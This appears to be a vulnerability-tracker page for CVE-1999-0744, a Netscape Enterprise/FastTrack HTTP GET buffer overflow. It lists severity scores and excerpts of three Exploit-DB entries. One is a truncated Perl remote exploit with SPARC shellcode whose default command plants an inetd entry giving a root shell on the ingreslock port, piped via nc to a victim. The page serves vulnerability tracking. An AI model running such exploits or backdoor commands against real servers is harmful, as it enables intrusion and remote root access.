CVE-1999-0744
Published 2000-01-04
CVE-1999-0744: Buffer overflow in Netscape Enterprise Server and FastTrack Server allows remote attackers to gain privileges via a long HTTP GET request.
Priority: P3 34, high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.50% (82.7th percentile)
No detection rules found.
Exploit-DB
Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution
exploitdb·2001-01-27
---
#!/usr/bin/perl
#
# Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7
# usage: ns-shtml.pl ['command line'] | nc victim port
#
# Sometimes server may hang or coredump.. eek ;-)
# [email protected]
$cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob";
$cmdline=$ARGV[0] if $ARGV[0];
$nop='%80%1b%c0%1f';
$strlen=0x54 + length($cmdline);
$cmdline=~ s/ /%20/g; # encode bad characters..
$strlen=sprintf "%%%x", $strlen;
$shell=
'%20%bf%ff%ff' .# start: bn,a ! super-dooper trick to get current address ;')
'%20%bf%ff%ff' .# boom: bn,a
'%7f%ff%ff%ff' .# call boom
'%90%03%e0%48' .# add %o7, binksh - boom, %o0 ! put binksh address into %o0
'%92%03
Exploit-DB
Netscape FastTrack Server 2.0.1a - GET Buffer Overflow
exploitdb·1999-12-31
---
// source: https://www.securityfocus.com/bid/908/info
The version of Netscape FastTrack server that ships with UnixWare 7.1 is vulnerable to a remote buffer overflow. By default, the httpd listens on port 457 of the UnixWare host and serves documentation via HTTP. If you pass the server a GET request with more than 367 characters, the stack overflows and the EIP is overwritten, making it possible to execute arbitrary code with the privileges of the httpd (usually nobody).
/** uwhelp.c - remote exploit for UnixWare's Netscape FastTrack
** 2.01a scohelp http service
**
** Runs the command of your choice with uid of the http daemon
** (probably nobody). If there are spaces in your command, use
** ${IFS} instead of a space. httpd
Exploit-DB
Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET
exploitdb·1999-08-25
---
source: https://www.securityfocus.com/bid/1024/info
A GET request containing over 4080 characters will cause the httpd.exe process to crash within Netscape Enterprise Server 3.6, resulting in a Dr. Watson error. Arbitrary code can be executed remotely at this point.
Netscape Enterprise Server 3.5 running on either Netware or Solaris is not known to be susceptible to this issue.
GET /(4080 character string) HTTP/1.0
No writeups or analysis indexed.
Published: 2000-01-04